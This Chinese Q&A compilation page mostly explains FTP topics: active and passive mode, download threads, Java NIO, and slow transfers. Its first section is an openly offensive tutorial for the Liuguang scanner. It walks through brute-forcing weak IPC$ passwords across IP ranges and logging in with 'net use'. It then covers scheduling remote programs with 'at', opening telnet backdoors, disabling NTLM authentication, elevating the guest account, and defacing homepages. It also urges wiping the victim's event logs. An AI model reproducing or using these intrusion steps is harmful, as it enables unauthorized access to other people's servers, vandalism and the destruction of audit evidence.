Ⅰ 求流光5.0的使用方法(要淺顯易懂)
流光5.0的使用方法
1:流光概述
流光是小容的作品,這款工具可以讓一個只會點擊滑鼠的人成為專業的黑客,這樣說一點也不誇張。它可以探測POP3,FTP,HTTP,PROXY,FROM,SQL,SMTP,IPC,等各種漏洞。並針對個中漏洞設計不同的破解方案。
2:流光使用:
步驟1:打開高級掃描向導設置掃描參數
「文件」--}「高級掃描向導」
--}在「起始」/「結束」位置填入,你要掃描的IP段。
--}在「 目標系統」中選擇你要檢測的操作系統。
--}在「獲取主機名」、「PING檢查」前面打勾
--}在「檢測項目」中選擇「全選」
--}然後單擊「下一步」選擇「標准埠掃描」
說明:「標准斷口」只對常見的斷口進行掃描。
「自定義」可以自己定義進行掃描。
--}然後單擊「下一步」 設置好所有檢測項目後點擊「下一步」
--}在選擇主機界面選擇「本地主機」使用本地主機進任務掃描。
步驟2:單擊「開始」掃描過程中要想停止選擇「取消」不過要等一段時間。
步驟3:查看掃描報告。掃描結束之後給出「HTLM」格式的報告
方法二:
一、POP3/FTP/…探測
二、IPC探測
三、SQL探測
四、高級掃描
五、其它 …
因為開發時間的原因,上面的探測模式略有不同,所以分成了四個部分,本教程說的是第一個部分的探測。後面的探測模式應該屬於流光的高級應用了:)
流光的IPC探測:
一、目的和任務:
1、用流光的IPC探測獲得一台NT主機的管理許可權,並將這台主機做成一個跳板/代理。
2、學習IPC探測的相關知識。
二、探測流程:
1、你得有流光,我這里試驗用的是流光2001.FOR Win2000 中文版。FOR Win98的不可以。因為IPC連接功能是NT/ 2000提供的功能。而且流光FOR 2K 要求你的操作系統得是NT/2000,否則流光啟動會失敗!
什麼是IPC:
IPC是指"InterProcess Communications",准確的說是ipc$,是默認的在系統啟動時的admin共享。
IPC$是Windows NT/2K中特有的遠程網路登陸功能,它的特點是在同一時間內,兩個IP之間只允許建立一個連接。
注意,你試圖通過IPC$連接會在EventLog中留下記錄。不管你是否登錄成功。
可不可以通過IPC$暴力破解密碼?當然可以 ! 不過,是不是太笨了點 …
2、首次啟動流光,會看到注冊的畫面,具體操作請參考本人第一篇教程。我們在主頁面上可以有幾種方法來通過IPC 探測獲得管理的許可權。這里我們要作的是得到一台跳板,那麼就可以用命中率高的辦法來探測了(測試一堆IP來得到弱口令)。
在主界面選擇 探測→探測POP3/FTP/NT/SQL主機選項,或者直接按Ctrl+R。
3、出先了上面的小窗口,輸入我們要破解的IP段,我們輸入了來看看。圖main2我們把「將FrontPage主機自動加入HTTP主機列表取消了」。因為我們只想獲得IPC弱口令,這樣可以加快掃描的速度 :)填入IP,選擇掃描NT/98主機
4、探測中……
(注意如果你要探測的是流光保留的國內的IP段,會被禁止的,也就是探測的時候信息欄出現"IP保留"的字樣)
有遠程主機的管理密碼了,我們剩下的就是想辦法控制它了,有什麼好辦么? :)有的是 !自己看看工具-菜單下的IIS遠程命令:)是不是很簡單呢,我以後在說,今天還是先練習net 命令吧。
黑了他 !
開個dos prompt 執行如下命令,本次用的例子如下圖。
1、 net use \\對方ip\ipc$ "密碼" /user:"用戶名" || 建立遠程連接
2、 icmd.exe \\對方ip\admin$ || admin$是對方的winnt目錄 :) 這里文件多。
3、 net time \\對方IP || 看看對方的本地時間
4、at \\對方ip 啟動程序的時間 啟動程序名 啟動程序的參數 || 用at命令來定時啟動程序,在這里我們用soon這個程序來做也可以,它可以取代 3/4兩步。
5、 telnet 對方ip 埠 ||
6、輸入pass (如果不是用icmd.exe,或者沒有設置口令就不用了) ||
7、在開個窗口,繼續 我們用的東西。 sock.exe ntlm.exe cl.exe clear.exe
如果我們真的想黑了他,只需要把我們的首頁文件覆蓋目標的首頁就ok了,我們可以通過dir /s default.htm或者dir /s index.htm 來確定對方首頁的為止,一般是在X:\interpub\wwwroot\ .
假如首頁文件是default.htm並且在c:\interpub\wwwroot,這樣: default.htm \\ip\c$\interpub\wwwroot
下面的圖有演示
8、其實黑人家是很低級並且沒意思的:(,我們最好是物有所有,作成跳板吧,今後幹活方便點:
執行我們 過去的ntlm.exe ,取消驗正。在給自己留個後門,比如提升guest的許可權,或者其它的後門工具,這類東西多了自己選吧,看看殺手的那堆東西 :)
9、還能做成其他的么 ?
當然了,只要你有時間,並且願意做,我曾經偷偷的把自己的主頁放到人家的server上,速度快、空間無限,嘿嘿 :)
10、日誌清除,斷開連接 :
執行我們 過去的cl.exe clear.exe 都可以清除日誌,比如clear all :清除所有的日誌。然後在斷開連接:net use \\ip\ipc$ /delete
流光簡介
流光4.7)一個絕好的ftp、pop3解密工具,界面豪華,功能強大!功能簡介如下:1、用於檢測POP3/FTP主機中用戶密碼安全漏洞。2、163/169雙通。3、多線程檢測,消除系統中密碼漏洞。4、高效的用戶流模式。5、高效伺服器流模式,可同時對多台POP3/FTP主機進行檢測。6、最多500個線程探測。7、線程超時設置,阻塞線程具有自殺功能,不會影響其他線程。8、支持10個字典同時檢測。9、檢測設置可作為項目保存。10、取消了國內IP限制而且免費。
流光4.7新增功能:
1、加入了本地模式,在本機運行是不必安裝Sensor。
2、Sensor掃描臨時結果文件(*.PTR)的尺寸大約減少了10倍。
3、後台掃描模式時,掃描的結果(*.PTR)可以直接通過附件發送到信箱。
4、Sensor的掃描速度加快。
5、減少了Sensor異常退出的BUG。
6、流光的界面和Sensor之間的通訊採用Triple-DES,密鑰的長度最多可到192bits,保證整個傳輸過程不可監聽。掃描的結果也只有在密鑰正確的情況下才可閱讀。
7、修正的控制服務,新的控制服務在升級Sensor時不再會失敗。
8、Sensor的服務名稱可以任意指定,控制服務和Sensor的進程名稱也可以任意指定。
9、支持XP(本地模式),很快會有98/ME的版本。
我是也是新手這是我找的東西!你自己照著做幾遍就會了!記得一定要清理好系統日至!!
Ⅱ 流光的作用有哪些拜託了各位 謝謝
流光4.7)一個絕好的ftp、pop3解密工具,界面豪華,功能強大!功能簡介如下:1、用於檢測POP3/FTP主機中用戶密碼安全漏洞。2、163/169雙通。3、多線程檢測,消除系統中密碼漏洞。4、高效的用戶流模式。5、高效伺服器流模式,可同時對多台POP3/FTP主機進行檢測。6、最多500個線程探測。7、線程超時設置,阻塞線程具有自殺功能,不會影響其他線程。8、支持10個字典同時檢測。9、檢測設置可作為項目保存。10、取消了國內IP限制而且免費。 流光4.7新增功能: 1、加入了本地模式,在本機運行是不必安裝Sensor。 2、Sensor掃描臨時結果文件(*.PTR)的尺寸大約減少了10倍。 3、後台掃描模式時,掃描的結果(*.PTR)可以直接通過附件發送到信箱。 4、Sensor的掃描速度加快。 5、減少了Sensor異常退出的BUG。 6、流光的界面和Sensor之間的通訊採用Triple-DES,密鑰的長度最多可到192bits,保證整個傳輸過程不可監聽。掃描的結果也只有在密鑰正確的情況下才可閱讀。 7、修正的控制服務,新的控制服務在升級Sensor時不再會失敗。 8、Sensor的服務名稱可以任意指定,控制服務和Sensor的進程名稱也可以任意指定。 9、支持XP(本地模式),很快會有98/ME的版本。
滿意請採納
Ⅲ ftp多個線程的影響
ftp多個線程的影響就好比可以同時使用多個匿名用戶是一樣的,只受你ftp最大連接數的限制。
開放ftp站點的人可以為帳戶單獨設置下載線程,也可以設定一個總的下載線程根據實際情況分配。他也可以隨時進行變更。
所有與該進程有關的資源,都被記錄在進程式控制制塊PCB中。以表示該進程擁有這些資源或正在使用它們。
另外,進程也是搶占處理機的調度單位,它擁有一個完整的虛擬地址空間。當進程發生調度時,不同的進程擁有不同的虛擬地址空間,而同一進程內的不同線程共享同一地址空間。
共享進程資源:
在同一進程中的各個線程,都可以共享該進程所擁有的資源,這首先表現在:所有線程都具有相同的地址空間(進程的地址空間),這意味著,線程可以訪問該地址空間的每一個虛地址。
此外,還可以訪問進程所擁有的已打開文件、定時器、信號量機構等。由於同一個進程內的線程共享內存和文件,所以線程之間互相通信不必調用內核。
Ⅳ linux中FTP的主進程跟從進程是什麼
我先假設你說的是linux系統中運行的ftp伺服器軟體。主進程就是一直運行在後台等待用戶來連接的那個進程,如果有一個用戶連接了這個ftp伺服器,主進程就會分裂出一個從進程,讓這個從進程一心一意地服務這個用戶,而主進程本身繼續等待下一個用戶。從進程在服務完一個用戶後就會退出。
一般來說,ftp伺服器上有幾個用戶,就會有幾個從進程與之對應。
也有的伺服器軟體不採用從進程的方式,而是用其他的方法來同時服務多個用戶,例如多線程方法或是非阻塞IO方法,有興趣的話可以參考一下網路程序設計的相關資料。
滿意么
:)
Ⅳ 如何判斷ftp當前是主動模式 被動模式設置
FTP只通過TCP連接,沒有用於FTP的UDP組件.FTP不同於其他服務的是它使用了兩個埠, 一個數據埠和一個命令埠(或稱為控制埠)。通常21埠是命令埠,20埠是數據埠。當混入主動/被動模式的概念時,數據埠就有可能不是20了。
主動模式FTP:
主動模式下,FTP客戶端從任意的非特殊的埠(N > 1023)連入到FTP伺服器的命令埠--21埠。然後客戶端在N+1(N+1 >= 1024)埠監聽,並且通過N+1(N+1 >= 1024)埠發送命令給FTP伺服器。伺服器會反過來連接用戶本地指定的數據埠,比如20埠。
以伺服器端防火牆為立足點,要支持主動模式FTP需要打開如下交互中使用到的埠:
l FTP伺服器命令(21)埠接受客戶端任意埠(客戶端初始連接)
l FTP伺服器命令(21)埠到客戶端埠(>1023)(伺服器響應客戶端命令)
l FTP伺服器數據(20)埠到客戶端埠(>1023)(伺服器初始化數據連接到客戶端數據埠)
l FTP伺服器數據(20)埠接受客戶端埠(>1023)(客戶端發送ACK包到伺服器的數據埠)
用圖表示如下:
在第1步中,客戶端的命令埠與FTP伺服器的命令埠建立連接,並發送命令「PORT 1027」。然後在第2步中,FTP伺服器給客戶端的命令埠返回一個"ACK"。在第3步中,FTP伺服器發起一個從它自己的數據埠(20)到客戶端先前指定的數據埠(1027)的連接,最後客戶端在第4步中給伺服器端返回一個"ACK"。
主動方式FTP的主要問題實際上在於客戶端。FTP的客戶端並沒有實際建立一個到伺服器數據埠的連接,它只是簡單的告訴伺服器自己監聽的埠號,伺服器再回來連接客戶端這個指定的埠。對於客戶端的防火牆來說,這是從外部系統建立到內部客戶端的連接,這是通常會被阻塞的。
主動FTP的例子:
下面是一個主動FTP會話的實際例子。當然伺服器名、IP地址和用戶名都做了改動。在這個例子中,FTP會話從 testbox1.slacksite.com (192.168.150.80),一個運行標準的FTP命令行客戶端的Linux工作站,發起到testbox2.slacksite.com (192.168.150.90),一個運行ProFTPd 1.2.2RC2的Linux工作站。debugging(-d)選項用來在FTP客戶端顯示連接的詳細過程。紅色的文字是 debugging信息,顯示的是發送到伺服器的實際FTP命令和所產生的回應信息。伺服器的輸出信息用黑色字表示,用戶的輸入信息用粗體字表示。
仔細考慮這個對話過程我們會發現一些有趣的事情。我們可以看到當 PORT 命令被提交時,它指定了客戶端(192.168.150.80)上的一個埠而不是伺服器的。當我們用被動FTP時我們會看到相反的現象。我們再來關注PORT命令的格式。就象你在下面的例子看到的一樣,它是一個由六個被逗號隔開的數字組成的序列。前四個表示IP地址,後兩個組成了用於數據連接的埠號。用第五個數乘以256再加上第六個數就得到了實際的埠號。下面例子中埠號就是((14*256) + 178) = 3762。我們可以用netstat來驗證這個埠信息。
testbox1: {/home/p-t/slacker/public_html} % ftp -d testbox2
Connected to testbox2.slacksite.com.
220 testbox2.slacksite.com FTP server ready.
Name (testbox2:slacker): slacker
---> USER slacker
331 Password required for slacker.
Password: TmpPass
---> PASS XXXX
230 User slacker logged in.
---> SYST
215 UNIX Type: L8
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
ftp: setsockopt (ignored): Permission denied
---> PORT 192,168,150,80,14,178
200 PORT command successful.
---> LIST
150 Opening ASCII mode data connection for file list.
drwx------ 3 slacker users 104 Jul 27 01:45 public_html
226 Transfer complete.
ftp> quit
---> QUIT
221 Goodbye.
Ⅵ 下載的時候所謂的「ftp伺服器線程」是什麼意思
就是可以用多少個線程下載.每一個線程表示一個下載通道.線程越多.速度越快.不過.有的伺服器是限制線程的.你用一下影音傳送帶.網路快車之類的多線程下載軟體就可感覺到了.呵....別開太多噢.小心人家封你IP
Ⅶ FTP上傳錯誤: 無法連接到伺服器,怎麼辦
FTP連接超時或出現列表錯誤的解決方法!
如果您在連接本站的ftp時,出現超時或很長時間才能看到ftp列表的話,請在你的ftp客戶端中,將「使用被動模式」的對勾去掉即可!
為什麼會出現這種情況呢?是因為我們的伺服器設置有防火牆,只開放了ftp的默認埠,客戶端在連接的時候如果使用被動模式,則需要連接伺服器的其它高埠,因此高埠是關閉的,就造成這種情況!
以Flashfxp為例,選擇菜單中的「站點管理器」,選擇你要修改的站點名稱,點擊右邊的「選項」菜單,將「使用被動模式」前對勾去掉即可!
以LeapFTP為例,選擇菜單中的「站點管理器」,選擇「高級」選項卡,把「使用PASV模式」前的對勾去掉即可!
以下為Cuteftppro為例
找到站點屬性,選擇「類型」,將「數據連接類型」改為「使用port」即可!
其它客戶端軟體自己查找!如果您已經使用了此方面,但是還是不能連接本站的ftp,那麼很可能你電腦上的高級埠被佔用了,伺服器無法連接你電腦上的高級埠,出現這種問題的原因可能是你的電腦上有大量下載線程,連接其它ftp的線路,以及開了多個QQ,因為這些軟體會佔用很多埠,還有可能是你這條寬頻是很多用戶共享使用的,那麼這個時候,其它電腦也會搶佔一部分埠的,雖然你的本機埠沒被佔用,但是公網ip上的高埠是有限的,用戶太多,埠佔用的也越多!
另外:你在連接空間伺服器時,ftp連接地址請填寫你的域名。希望對你有用!!
Ⅷ ftpclient 用的是nio還是io
nio是new io的簡稱,從jdk1.4就被引入了。現在的jdk已經到了1.6了,可以說不是什麼新東西了。但其中的一些思想值得我來研究。這兩天,我研究了下其中的套接字部分,有一些心得,在此分享。
首先先分析下:為什麼要nio套接字?
nio的主要作用就是用來解決速度差異的。舉個例子:計算機處理的速度,和用戶按鍵盤的速度。這兩者的速度相差懸殊。如果按照經典的方法:一個用戶設定一個線程,專門等待用戶的輸入,無形中就造成了嚴重的資源浪費:每一個線程都需要珍貴的cpu時間片,由於速度差異造成了在這個交互線程中的cpu都用來等待。
nio套接字是怎麼做到的?
其實,其中的思想很簡單:輪詢。一個線程輪詢多個input;傳統的方式是:有n個客戶端就要有n個服務線程+一個監聽線程,現在採取這種凡是,可以僅僅使用1個線程來代替n個服務線程以此來解決。
具體應用例子:
在ftp的控制連接中,因為只有少量的字元命令進行傳輸,所以可以考慮利用這種輪詢的方式實現,以節省資源。
-----------------------------------------------------
Java中的阻塞和非阻塞IO包各自的優劣思考
NIO 設計背後的基石:反應器模式,用於事件多路分離和分派的體系結構模式。
反應器(Reactor):用於事件多路分離和分派的體系結構模式
通常的,對一個文件描述符指定的文件或設備, 有兩種工作方式: 阻塞 與非阻塞 。所謂阻塞方式的意思是指, 當試圖對該文件描述符進行讀寫時, 如果當時沒有東西可讀,或者暫時不可寫, 程序就進入等待 狀態, 直到有東西可讀或者可寫為止。而對於非阻塞狀態, 如果沒有東西可讀, 或者不可寫, 讀寫函數馬上返回, 而不會等待 。
一種常用做法是:每建立一個Socket連接時,同時創建一個新線程對該Socket進行單獨通信(採用阻塞的方式通信)。這種方式具有很高的響應速度,並且控制起來也很簡單,在連接數較少的時候非常有效,但是如果對每一個連接都產生一個線程的無疑是對系統資源的一種浪費,如果連接數較多將會出現資源不足的情況。
另一種較高效的做法是:伺服器端保存一個Socket連接列表,然後對這個列表進行輪詢,如果發現某個Socket埠上有數據可讀時(讀就緒),則調用該socket連接的相應讀操作;如果發現某個 Socket埠上有數據可寫時(寫就緒),則調用該socket連接的相應寫操作;如果某個埠的Socket連接已經中斷,則調用相應的析構方法關閉該埠。這樣能充分利用伺服器資源,效率得到了很大提高。
傳統的阻塞式IO,每個連接必須要開一個線程來處理,並且沒處理完線程不能退出。
非阻塞式IO,由於基於反應器模式,用於事件多路分離和分派的體系結構模式,所以可以利用線程池來處理。事件來了就處理,處理完了就把線程歸還。而傳統阻塞方式不能使用線程池來處理,假設當前有10000個連接,非阻塞方式可能用1000個線程的線程池就搞定了,而傳統阻塞方式就需要開10000個來處理。如果連接數較多將會出現資源不足的情況。非阻塞的核心優勢就在這里。
為什麼會這樣,下面就對他們做進一步細致具體的分析:
首先,我們來分析傳統阻塞式IO的瓶頸在哪裡。在連接數不多的情況下,傳統IO編寫容易方便使用。但是隨著連接數的增多,問題傳統IO就不行了。因為前面說過,傳統IO處理每個連接都要消耗 一個線程,而程序的效率當線程數不多時是隨著線程數的增加而增加,但是到一定的數量之後,是隨著線程數的增加而減少。這里我們得出結論,傳統阻塞式IO的瓶頸在於不能處理過多的連接。
然後,非阻塞式IO的出現的目的就是為了解決這個瓶頸。而非阻塞式IO是怎麼實現的呢?非阻塞IO處理連接的線程數和連接數沒有聯系,也就是說處理10000個連接非阻塞IO不需要10000個線程,你可以用1000個也可以用2000個線程來處理。因為非阻塞IO處理連接是非同步的。當某個連接發送請求到伺服器,伺服器把這個連接請求當作一個請求"事件",並把這個"事件"分配給相應的函數處理。我們可以把這個處理函數放到線程中去執行,執行完就把線程歸還。這樣一個線程就可以非同步的處理多個事件。而阻塞式IO的線程的大部分時間都浪費在等待請求上了。
Ⅸ ftp怎麼開線程啊
FTP下載,有的伺服器,會限制你的線程的,主要是考慮到帶寬和伺服器的承載能力。
Ⅹ 為什麼FTP下載很慢
FTP下載速度慢的原因比較多,但一般來說,就以下幾點:
首當其沖的就是伺服器的所謂的質量問題,即伺服器的配置,配置好的空間自然就速度快,然後是所在的地理位置,帶寬的地域自然速度也快,在這之後還有對伺服器的維護程度,是否有病毒侵佔,有時病毒會慢慢拉垮資源,越來越慢,最後致使系統崩潰。
接著就是上傳文件所在地,即客戶端的電腦速度快慢,還是所在區域網的速度,這些自然是重要因素,伺服器速度再快,本地的速度慢,怎麼也不會快起來。
然後是由於某個文件卡住了,或是FTP佔用了伺服器好久的資源,有時也會特慢,解決這種情況的辦法就是將FTP關掉,重新打開一個,繼續上傳,但要記得是採用續傳,不能採用覆蓋,否則先前上傳的成果與功勞都沒了。
最後還有一種情況,盡管反復重啟FTP,但就是不行,速度還是很慢,在這種情況下,當然也有可能是伺服器出了問題或是被病毒侵佔了,或是內存在這個特定時候消耗得厲害,解決這種情況,可以將路由重啟一下,換成另外一個IP,然後再將FTP關掉重新打開。